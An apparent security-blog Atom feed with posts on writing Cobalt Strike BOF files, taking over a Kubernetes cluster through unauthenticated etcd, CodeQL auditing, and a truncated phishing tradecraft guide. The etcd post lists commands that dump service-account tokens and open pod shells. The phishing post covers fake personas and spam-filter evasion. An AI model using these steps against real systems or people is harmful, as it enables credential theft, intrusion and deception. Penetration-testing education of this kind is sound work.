<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="https://oceansec.github.io/atom.xml" rel="self"/>
<link href="https://oceansec.github.io/"/>
<updated>2024-01-02T07:59:17.324Z</updated>
<id>https://oceansec.github.io/</id>
<author>
<name>John Doe</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Writing and converting Cobalt Strike BOF files</title>
<link href="https://oceansec.github.io/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/"/>
<id>https://oceansec.github.io/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/</id>
<published>2024-01-02T07:55:21.000Z</published>
<updated>2024-01-02T07:59:17.324Z</updated>
<content type="html"><![CDATA[<p>Beacon Object File (BOF) is a feature added in Cobalt Strike 4.1.</p><blockquote><p>Before Beacon receives and executes the obj, Cobalt Strike first processes the obj file: it parses the sections it needs, such as .text and .data, processes tables such as IMAGE_RELOCATION and IMAGE_SYMBOL, and after this series of steps packs the required parts in a fixed format and sends them to Beacon. What Beacon receives is therefore obj data that Cobalt Strike has already parsed and processed, not the original obj file, so Beacon mainly does the things that can only be determined and completed inside the process, such as applying relocations and filling in function pointers, and finally executes the go entry point.</p></blockquote><p>An obj object file is the intermediate file produced by compiling source code without linking it (.obj on Windows, .o on Linux; this article mainly refers to Windows obj files).</p><h2 id="使用BOF框架开发"><a href="#使用BOF框架开发" class="headerlink" title="使用BOF框架开发"></a>Developing with a BOF template</h2><p>Several people have published templates on GitHub that can be used as a reference:</p><ul><li>Visual Studio template for BOFs: <a href="https://github.com/securifybv/Visual-Studio-BOF-template">https://github.com/securifybv/Visual-Studio-BOF-template</a></li><li>Header files needed by BOFs: <a href="https://github.com/trustedsec/CS-Situational-Awareness-BOF">https://github.com/trustedsec/CS-Situational-Awareness-BOF</a></li><li>A tidied variant that groups the Windows API functions by DLL name: <a href="https://github.com/evilashz/Visual-Studio-BOF-template">https://github.com/evilashz/Visual-Studio-BOF-template</a></li></ul><p>Extract the downloaded template into the Visual Studio template directory (<code>%UserProfile%\Documents\Visual Studio 2022\Templates\ProjectTemplates</code>), then restart Visual Studio.</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103237373.png" alt="image-20240102103237373"></p><p>When creating a project, choose the <code>Beacon Object File</code> project type.</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103310526.png" alt="image-20240102103310526"></p><p><code>beacon.h</code> and <code>bofdefs.h</code> appear in the header file list.</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103350426.png" alt="image-20240102103350426"></p><p>Open Build -> Batch Build and tick the BOF configuration.</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103506658.png" alt="image-20240102103506658"></p><p>The build configuration in Configuration Manager also needs to be set to BOF.</p><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102103532153.png" alt="image-20240102103532153"></p><p>A minimal BOF project that prints a string to the console:</p><ul><li>BOF entry: the code defines the BOF entry function go. When you load and run the BOF with the inline-execute command in Cobalt Strike, this function is called; put your BOF code in it.</li><li>Non-BOF entry: this part defines the ordinary entry function main, which is called when you run the code outside Cobalt Strike; put your non-BOF code there.</li></ul><pre><code class="language-cpp">#include "bofdefs.h"

extern "C" {

// BOF entry point: Beacon calls this after loading the .obj via inline-execute
void go(char* buff, int len) {
    BeaconPrintf(CALLBACK_OUTPUT, "Hello, World!");
}

}

#ifndef BOF
// Non-BOF entry point so the same code runs as a normal executable
// (the template's bofdefs.h is assumed to map BeaconPrintf to printf in this build)
int main(int argc, char* argv[]) {
    go(NULL, 0);
    return 0;
}
#endif
</code></pre><p>Building the project produces a <code>.obj</code> file, that is, a compiled but unlinked object file. In Cobalt Strike you load and run it with the <code>inline-execute</code> command, which loads the <code>.obj</code> into Beacon's memory and then calls your <code>go</code> function. The command format is:</p><pre><code class="language-plaintext">beacon> inline-execute your_bof.obj
</code></pre><p><img src="/2024/01/02/BOF%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99-%E6%94%B9%E5%86%99/image-20240102145032414.png" alt="image-20240102145032414"></p><h2 id="修改为BOF格式"><a href="#修改为BOF格式" class="headerlink" title="修改为BOF格式"></a>Converting existing code to BOF format</h2><p>Steps to turn existing code into BOF code:</p><ol><li>Include the beacon.h header, which defines the data types and functions needed to interact with the Cobalt Strike Beacon.</li><li>Change all strings and functions to their ASCII (narrow) versions.</li><li>Rewrite all API calls to the convention defined by beacon.h.</li><li>Rename the entry function from main to go.</li><li>Build the BOF file.</li></ol><p>As a worked case, <a href="https://idiotc4t.com/persistence/get-computer-installed-software">get-computer-installed-software</a> is converted to load as a BOF. The code queries the registry for the programs installed on the machine. This only covers software that went through a full installer; portable software can only be found by manual or automated file searches, and on an x64 system the 32-bit programs also need to be enumerated (x64 applies registry redirection).</p><pre><code class="language-cpp">#include <stdio.h>
#include <Windows.h>
#include <tchar.h>

BOOL EnumInstalledSoft(TCHAR* subKey, TCHAR* subKeyName)
{
    HKEY hKey = NULL;
    HKEY hSubKey = NULL;
    DWORD dwIndex = 0;
    TCHAR keyName[MAX_PATH] = { 0 };
    DWORD dwNameLen = MAX_PATH;              // size of keyName, in characters
    TCHAR subKeyValue[MAX_PATH] = { 0 };
    DWORD dwValueSize = sizeof(subKeyValue); // size of subKeyValue, in bytes

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subKey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
    {
        return FALSE;
    }

    while (RegEnumKeyEx(hKey, dwIndex, keyName, &dwNameLen, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
    {
        if (RegOpenKeyEx(hKey, keyName, 0, KEY_READ, &hSubKey) == ERROR_SUCCESS)
        {
            if (RegQueryValueEx(hSubKey, subKeyName, NULL, NULL, (LPBYTE)subKeyValue, &dwValueSize) == ERROR_SUCCESS)
            {
                subKeyValue[MAX_PATH - 1] = 0; // registry strings are not guaranteed to be terminated
                _tprintf(_T("%s : %s \n"), keyName, subKeyValue);
            }
            RegCloseKey(hSubKey);
            hSubKey = NULL;
        }

        ++dwIndex;
        // both sizes are in/out parameters and must be reset for every iteration
        dwNameLen = MAX_PATH;
        dwValueSize = sizeof(subKeyValue);
    }

    RegCloseKey(hKey);
    return TRUE;
}

int main()
{
    EnumInstalledSoft((TCHAR*)_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"), (TCHAR*)_T("DisplayName"));
    EnumInstalledSoft((TCHAR*)_T("Software\\Classes\\Installer\\Products"), (TCHAR*)_T("ProductName"));
    system("pause");
    return 0;
}
</code></pre><p>Next, include beacon.h and rewrite the calls in the BOF convention. <a href="https://github.com/dtmsecurity/bof_helper">bof_helper</a> generates the BOF-style function prototypes for us, for example turning GetProcAddress into KERNEL32$GetProcAddress, so the tool is used directly here. The output function also has to be replaced with the one Beacon exports.</p><p><strong>BOF-format code</strong></p><pre><code class="language-cpp">#include <windows.h>
// 1. Add the beacon.h header
#include "beacon.h"

// 2. Declare the imports in the DLL$Function convention; other projects often already declare the same ones
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyA(HKEY, LPCSTR, PHKEY);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegEnumKeyExA(
    HKEY,
    DWORD,
    LPSTR,
    LPDWORD,
    LPDWORD,
    LPSTR,
    LPDWORD,
    PFILETIME
);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExA(
    HKEY,
    LPCSTR,
    LPDWORD,
    LPDWORD,
    LPBYTE,
    LPDWORD
);

BOOL EnumInstalledSoft(CHAR* subKey, CHAR* subKeyName)
{
    HKEY hKey = NULL;
    HKEY hSubKey = NULL;
    DWORD dwIndex = 0;
    CHAR keyName[MAX_PATH] = { 0 };
    DWORD dwNameLen = MAX_PATH;              // size of keyName, in characters
    CHAR subKeyValue[MAX_PATH] = { 0 };
    DWORD dwValueSize = sizeof(subKeyValue); // size of subKeyValue, in bytes

    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, subKey, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
    {
        return FALSE;
    }

    while (ADVAPI32$RegEnumKeyExA(hKey, dwIndex, keyName, &dwNameLen, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
    {
        if (ADVAPI32$RegOpenKeyA(hKey, keyName, &hSubKey) == ERROR_SUCCESS)
        {
            if (ADVAPI32$RegQueryValueExA(hSubKey, subKeyName, NULL, NULL, (LPBYTE)subKeyValue, &dwValueSize) == ERROR_SUCCESS)
            {
                subKeyValue[MAX_PATH - 1] = 0;
                // 3. Output goes through BeaconPrintf instead of printf
                BeaconPrintf(CALLBACK_OUTPUT, "%s : %s \n", keyName, subKeyValue);
            }
            ADVAPI32$RegCloseKey(hSubKey);
            hSubKey = NULL;
        }

        ++dwIndex;
        dwNameLen = MAX_PATH;
        dwValueSize = sizeof(subKeyValue);
    }

    ADVAPI32$RegCloseKey(hKey);
    return TRUE;
}

// 4. The entry point is go instead of main; Beacon passes the packed arguments and their length
void go(char* args, int length)
{
    EnumInstalledSoft((CHAR*)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", (CHAR*)"DisplayName");
    EnumInstalledSoft((CHAR*)"Software\\Classes\\Installer\\Products", (CHAR*)"ProductName");
}
</code></pre><p>Other differences in the BOF format:</p><ul><li><p>Passing arguments</p><p>The code above takes no arguments. If arguments are passed in, the parser has to be initialised over the argument buffer before anything is extracted:</p><pre><code class="language-cpp">void go(char* args, int length)
{
    datap parser;
    char* str_arg;
    int num_arg;

    // bind the parser to the buffer Beacon passed in; without this the extract calls read garbage
    BeaconDataParse(&parser, args, length);
    str_arg = BeaconDataExtract(&parser, NULL); // arguments come back in the order they were packed
    num_arg = BeaconDataInt(&parser);
}
</code></pre></li><li><p>Output</p><p>Replace printf with BeaconPrintf:</p><pre><code class="language-cpp">BeaconPrintf(CALLBACK_ERROR, "ERROR");
</code></pre></li></ul><h3 id="编译"><a href="#编译" class="headerlink" title="编译"></a>Compiling</h3><p>Compile with gcc, which needs to be <a href="https://blog.csdn.net/weixin_64064486/article/details/123940266">installed</a> beforehand:</p><pre><code class="language-bash">gcc -c <source>.c -o <output>.o
</code></pre><p>Note: the 64-bit toolchain must be installed to compile a 64-bit obj file; see the <a href="https://www.jianshu.com/p/d66c2f2e3537">MinGW-w64 installation guide</a>.</p><p>The resulting BOF file is then used directly in Cobalt Strike with inline-execute.</p><h3 id="bof-缺点"><a href="#bof-缺点" class="headerlink" title="bof 缺点"></a><strong>BOF drawbacks</strong></h3><ol><li>Global variables initialised to 0 do not seem to work.</li><li>Not well suited to long-running resident tasks; heavy loops crash.</li><li>A crash takes down the entire Beacon.</li><li>Hard to debug.</li><li>Output does not seem to support Unicode.</li></ol><p>References</p><ul><li><a href="https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3">Beacon Object File (how BOFs work)</a></li><li><a href="https://blog.csdn.net/xf555er/article/details/132416469">Writing BOFs for Cobalt Strike (part 11)</a></li><li><a href="https://tttang.com/archive/1786/#toc_0x08-execuate-assembly">Cobalt Strike BOF internals analysis</a></li></ul>]]></content>
<summary type="html"><p>Beacon Object File (BOF) is a feature added in Cobalt Strike 4.1.</p>
<blockquote>
<p>Before Beacon receives and executes the obj, Cobalt Strike first processes the obj file, for example parsing the sections it needs such as .text and .data, and processing some</summary>
</entry>
<entry>
<title>From unauthenticated etcd access to control of a k8s cluster</title>
<link href="https://oceansec.github.io/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/"/>
<id>https://oceansec.github.io/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/</id>
<published>2023-12-27T01:03:48.375Z</published>
<updated>2023-12-27T01:17:33.642Z</updated>
<content type="html"><![CDATA[<p>After K8s is installed, the etcd component is installed by default. etcd is a highly available key-value database that provides the underlying data store for the k8s cluster and holds the state of the entire cluster. In most deployments the database contents are not encrypted, so an attacker who takes over etcd effectively controls the whole K8s cluster.</p><p><strong>Unauthenticated etcd access</strong></p><p>If etcd was started without the certificate authentication option and port 2379 is exposed directly, the instance is vulnerable to unauthenticated access. The corresponding hardening follows from that precondition: start etcd with client certificate authentication enabled and keep 2379 reachable only from the control plane.</p><p>Request <a href="https://ip:2379/version">https://IP:2379/version</a> or <a href="https://ip:2379/v2/keys">https://IP:2379/v2/keys</a> on the target to check for unauthenticated access. If the response looks like the following, unauthenticated access is confirmed.</p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222085653333.png" alt="image-20231222085653333"></p><h3 id="1-查找token"><a href="#1-查找token" class="headerlink" title="1.查找token"></a>1. Find a token</h3><p>This needs the etcd command-line client, <a href="https://etcd.io/docs/v3.4/install/">etcdctl</a>.</p><p>Each Service Account is associated with a set of credentials stored in a Secret, so we can filter the Secrets for one with high privileges and use its token to take over the K8s cluster.</p><pre><code class="language-bash"># list all secrets
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get / --prefix --keys-only | sort | uniq | grep secret
</code></pre><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222090234172.png" alt="image-20231222090234172"></p><p>From the returned keys pick one with a high-privilege role and read its token. Taking /registry/secrets/kube-system/dashboard-admin-token-c7spp as an example, kube-system is the namespace and dashboard-admin is the clusterrole.</p><pre><code class="language-bash"># read the certificate and token stored in the given secret
ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp
</code></pre><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222090606284.png" alt="image-20231222090606284"></p><p>Copy the token: it is the part of the output between token? and #kubernetes.io/service-account-token.</p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222112025096.png" alt="image-20231222112025096"></p><p>If KubeOperator is installed on the machine with a weak password, the management token can be obtained from the cluster view after logging in.</p><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222113634553.png" alt="image-20231222113634553"></p><p>If the API server address is unknown, it can be obtained through webkubectl:</p><pre><code class="language-bash">kubectl cluster-info
</code></pre><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222113822617.png" alt="image-20231222113822617"></p><h3 id="2-验证token有效性"><a href="#2-验证token有效性" class="headerlink" title="2.验证token有效性"></a>2. Verify that the token is valid</h3><pre><code class="language-bash"># the API server expects a bearer token in the Authorization header
curl --header "Authorization: Bearer <token>" -X GET https://172.16.200.70:6443/api -k
</code></pre><h3 id="3-使用-kebuctl-去执行命令"><a href="#3-使用-kebuctl-去执行命令" class="headerlink" title="3.使用 kebuctl 去执行命令"></a>3. Run commands with kubectl</h3><p>Here the token is passed directly on the command line; alternatively a kubeconfig file can be built and specified, but that is more involved.</p><pre><code class="language-bash">kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods
</code></pre><p><img src="/2023/12/27/etcd%E6%9C%AA%E6%8E%88%E6%9D%83%E5%88%B0%E6%8E%A7%E5%88%B6k8s%E9%9B%86%E7%BE%A4/image-20231222112738092.png" alt="image-20231222112738092"></p><p>Common kubectl commands</p><pre><code class="language-bash"># list all resources
kubectl get all
kubectl get all --all-namespaces
# list pods
kubectl get pods -o wide --all-namespaces
#   -n <namespace>  selects the namespace
#   -o wide         shows details
# run a command in a pod
kubectl exec -it <pod> -n <namespace> -- <command>
#   -- bash  opens a shell
# download a file
kubectl cp -n <namespace> <pod>:/data/1.hprof <local path>
#   <pod>:<path of the file to download inside the pod> <local path to save it to>
</code></pre><p>Further reading</p><ul><li><a href="https://xz.aliyun.com/t/12921#toc-0">K8s cluster security attack and defense (part 1)</a></li><li><a href="https://xz.aliyun.com/t/12930">K8s cluster security attack and defense (part 2)</a></li></ul>]]></content>
<summary type="html"><p>After K8s is installed, the etcd component is installed by default. etcd is a highly available key-value database that provides the underlying data store for the k8s cluster and holds the state of the entire cluster. In most deployments the database contents are not encrypted, so an attacker who takes over etcd effectively controls the whole K8s cluster.</p>
<</summary>
<category term="渗透测试" scheme="https://oceansec.github.io/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="云安全" scheme="https://oceansec.github.io/tags/%E4%BA%91%E5%AE%89%E5%85%A8/"/>
</entry>
<entry>
<title>A first look at CodeQL</title>
<link href="https://oceansec.github.io/2023/12/05/%E5%88%9D%E8%A7%81codeql/"/>
<id>https://oceansec.github.io/2023/12/05/%E5%88%9D%E8%A7%81codeql/</id>
<published>2023-12-05T03:10:27.000Z</published>
<updated>2023-12-05T03:13:03.188Z</updated>
<content type="html"><![CDATA[<h2 id="安装CodeQL"><a href="#安装CodeQL" class="headerlink" title="安装CodeQL"></a>Installing CodeQL</h2><p>CodeQL itself consists of two parts: the analysis engine plus the <code>SDK</code></p><ol><li><p>Download the pre-built CodeQL executable</p><p><a href="https://github.com/github/codeql-cli-binaries/releases">https://github.com/github/codeql-cli-binaries/releases</a></p><p>After downloading, configure the environment variables</p></li><li><p>Install the SDK</p><p>Open CMD in the CodeQL installation directory and install the SDK with Git</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/Semmle/ql</span><br></pre></td></tr></table></figure></li><li><p>Install the VS Code extension: search for CodeQL in the marketplace and install the first result</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204104312841.png" alt="image-20231204104312841"></p></li><li><p>After installing, configure the CodeQL directory</p><p>Click the gear button to the right of the extension and enter the CodeQL installation directory; the path must go all the way to codeql.exe (the screenshot below omits it, which causes a bug)</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204104429485.png" alt="image-20231204104429485"></p></li><li><p>Because auditing Java code also requires maven, install MVN</p><p>Download it from the official site: <a href="https://maven.apache.org/download.cgi">https://maven.apache.org/download.cgi</a>, then configure the environment variables. When the Windows system language is Chinese, error messages may contain garbled Chinese characters</p></li></ol><h2 id="简单使用"><a href="#简单使用" class="headerlink" title="简单使用"></a>Basic usage</h2><p>Because <code>CodeQL</code> does not operate on the source code itself but on an intermediate AST database generated from it, we first need to convert the project source into a <code>CodeDatabase</code> that <code>CodeQL</code> can work with</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create ../codeqldatabase --language=<span class="string">"java"</span> --<span class="built_in">command</span>=<span class="string">"mvn clean install --file pom.xml"</span> --source-root=C:\Users\admin\Downloads\micro_service_seclab-main</span><br></pre></td></tr></table></figure><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204143940460.png" alt="image-20231204143940460"></p><p>Importing the database</p><p>Import the finished database in vscode</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204143925694.png" alt="image-20231204143925694"></p><p>The database loaded successfully</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204144132690.png" alt="image-20231204144132690"></p><p>Write a test QL query: open the folder containing the SDK in vscode, create a new ql file in the directory shown in the figure, then right-click and choose run query</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204144926981.png" alt="image-20231204144926981"></p><h2 id="基础语法"><a href="#基础语法" class="headerlink" title="基础语法"></a>Basic syntax</h2><p>CodeQL's core engine is not open source. One of its jobs is to convert the code files we want to audit into the intermediate AST database that CodeQL understands; we then write QL queries to extract the data we want. Since CodeQL has open-sourced all of its rules and rule libraries, what we can do is write QL rules that match our business logic, run them with the CodeQL engine, and find the security vulnerabilities in the target application</p><blockquote><p>What are source and sink?</p><p>In the theory of automated code security auditing there is one core triple: (source, sink, and sanitizer)</p><ul><li>A source is the input point of the vulnerability taint chain. For example, the code that reads parameters from an HTTP request is an obvious source</li><li>A sink is the execution point of the taint chain. For a SQL injection vulnerability, the function that finally executes the SQL statement is the sink (it might be called query, exeSql, or something else)</li><li>A sanitizer, also called a purification function, is any method in the vulnerability chain that breaks the propagation from source to sink</li></ul></blockquote><p>A vulnerability exists only when both a source and a sink are present and the path from the source to the sink is reachable</p><p>For the detailed syntax see: <a href="https://www.freebuf.com/articles/web/283795.html">CodeQL从入门到放弃</a></p><h2 id="CodeQLpy"><a href="#CodeQLpy" class="headerlink" title="CodeQLpy"></a>CodeQLpy</h2><p><a href="https://github.com/webraybtl/CodeQLpy">CodeQLpy</a> is an automated code auditing tool built on CodeQL. It currently supports only Java, with support for other languages planned, and can audit several kinds of Java code: jsp files, SpringMVC war packages, SpringBoot jar packages, and maven source code</p><p>After installing CodeQL, put the python files into the CodeQL directory and install the dependencies</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip3 install -r requirements.txt</span><br></pre></td></tr></table></figure><p>Then go into the config directory and edit the ini configuration; values containing spaces must be quoted</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[codeql]</span></span><br><span class="line"><span class="attr">qlpath</span> = D:\_Tools\My_Safe_Tools\codeql\ql\java\ql\test</span><br><span class="line"><span class="attr">jdk8</span> = <span class="string">"C:\Program Files\Java\jdk1.8.0_152\bin\java.exe"</span></span><br><span class="line"><span class="attr">jdk11</span> = <span class="string">"C:\Program Files\Java\jdk-11\bin\java.exe"</span></span><br><span class="line"><span class="attr">idea_decode_tool</span> = lib/java-decompiler.jar</span><br><span class="line"><span class="attr">jd_decode_tool</span> = lib/jd-cli.jar</span><br><span class="line"><span class="attr">jsp_decode_tool</span> = lib/jsp2class.jar</span><br><span class="line"><span class="attr">ecj_tool</span> = lib/ecj-<span class="number">4.6</span>.<span class="number">1</span>.jar</span><br><span class="line"><span class="attr">tomcat_jar</span> = lib/tomcat_lib</span><br><span class="line"><span class="attr">spring_boot_jar</span> = lib/spring_boot_lib</span><br><span class="line"><span class="attr">decode_savedir</span> = out/decode/</span><br><span class="line"><span class="attr">general_dbpath</span> = out/database/</span><br><span class="line"><span class="attr">maven_savedir</span> = out/mvn/</span><br><span class="line"><span class="attr">decompile_type</span> = jd</span><br><span class="line"><span class="attr">debug</span> = <span class="literal">on</span></span><br><span class="line"><span class="attr">model</span> = fast</span><br><span class="line"><span class="attr">thread_num</span> = <span class="number">10</span></span><br><span class="line"></span><br><span class="line"><span class="section">[log]</span></span><br><span class="line"><span class="attr">path</span> = out/log/</span><br></pre></td></tr></table></figure><ol><li><p>Initialize database generation</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// Without the -c option java files are scanned by default; with it, class files are scanned</span><br><span class="line">// The -t parameter is the path to the target source; supported types are a folder, a jar package, or a war package</span><br><span class="line">python3 main.py -t path/to/the-project-to-audit</span><br></pre></td></tr></table></figure><p>After it runs, the final output tells you the command to execute next</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204174207054.png" alt="image-20231204174207054"></p></li><li><p>Generate the database</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># windows</span></span><br><span class="line">codeql database create out/database/micro_service_seclab-main --language=java --source-root=<span class="string">"C:\Users\admin\Downloads\micro_service_seclab-main"</span> --<span class="built_in">command</span>=<span class="string">"D:\_Tools\My_Safe_Tools\codeql\CodeQLpy-master\out\decode/run.cmd"</span> --overwrite</span><br><span class="line"><span class="comment"># linux</span></span><br><span class="line">codeql database create out/database/SecExample-main --language=java --<span class="built_in">command</span>=<span class="string">"/bin/bash -c /Users/xxx/CodeQLpy/out/decode/run.sh"</span> --overwrite</span><br></pre></td></tr></table></figure><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231204174521388.png" alt="image-20231204174521388"></p><p>Running this generates the database; ignore any errors along the way, as long as you see Successfully created database at the end</p></li><li><p>Finally, query for vulnerabilities</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python main.py -d out/database/micro_service_seclab-main</span><br></pre></td></tr></table></figure><p>The program scans for vulnerabilities using its bundled ql queries and automatically generates a csv file when it finishes</p><p><img src="/2023/12/05/%E5%88%9D%E8%A7%81codeql/image-20231205100612615.png" alt="image-20231205100612615"></p></li></ol><p>Open source projects</p><ul><li><a href="https://github.com/ZhuriLab/Yi">Project monitoring tool and automatic Codeql runner</a></li><li><a href="https://github.com/webraybtl/CodeQLpy">CodeQLpy</a></li></ul><p>References</p><ol><li><a href="https://www.freebuf.com/articles/web/283795.html">CodeQL从入门到放弃</a></li><li><a href="https://mp.weixin.qq.com/s/iW7EGEAylqcltYgGo_KdvA">CodeQL与XRay联动实现黑白盒双重校验</a></li></ol>]]></content>
<summary type="html"><h2 id="安装CodeQL"><a href="#安装CodeQL" class="headerlink" title="安装CodeQL"></a>Installing CodeQL</h2><p>CodeQL itself consists of two parts: the analysis engine plus the <code>SDK</code></p>
<ol>
<l</summary>
</entry>
<entry>
<title>A Short Summary of Email Phishing</title>
<link href="https://oceansec.github.io/2023/12/05/%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC%E5%B0%8F%E6%80%BB%E7%BB%93/"/>
<id>https://oceansec.github.io/2023/12/05/%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC%E5%B0%8F%E6%80%BB%E7%BB%93/</id>
<published>2023-12-05T02:59:04.866Z</published>
<updated>2022-09-20T09:55:30.090Z</updated>
<content type="html"><![CDATA[<p><img src="https://s2.loli.net/2022/09/15/z7o8JmQqHZVhTsg.png" alt="img"></p><ol><li><p>Preparation</p><p>Email accounts, WeChat accounts, Maimai accounts, anonymous phone numbers and so on must be anonymous; for the VPS, C2 and the like, check whether they have been flagged</p><p>Rotate among several mailboxes; sending too much from one gets it classified as spam and the mailbox is easily banned</p><p>Set up a vague persona in advance; WeChat and Maimai accounts need to be aged, and the persona can be made fairly senior so that people want to click; it is advisable to change the name for every hw</p><p>It is best to use a 163 mailbox and change the display name so that the received mail looks more formal</p><p><img src="https://s2.loli.net/2022/09/20/dp5mGBvue43V7oJ.png" alt="截屏2022-09-20 17.40.23"></p><p><img src="https://s2.loli.net/2022/09/20/KSsTcFiECBmeYUa.png" alt="截屏2022-09-20 17.41.09"></p></li><li><p>Information gathering</p><ol><li><p>Search engines and WeChat official accounts: look for recent, accurate information, usually recruitment and tender notices, e.g. email addresses and phone numbers</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">目标名字</span><br><span class="line">"XXXX" 联系方式</span><br><span class="line"> 投递简历</span><br><span class="line"> hr</span><br><span class="line"> 招聘</span><br><span class="line"> 应聘</span><br><span class="line"> 贷款</span><br><span class="line"> 手机号</span><br></pre></td></tr></table></figure></li><li><p>Email collection sites; the problem with these is that they return too many stale addresses to pinpoint a person</p><p><a href="http://www.skymem.info/">http://www.skymem.info/</a></p><p><a href="https://phonebook.cz/">https://phonebook.cz/</a></p><p>After collecting addresses we need to verify them, because some have been abandoned by the target's staff (resignation, transfer, etc.)</p><p><a 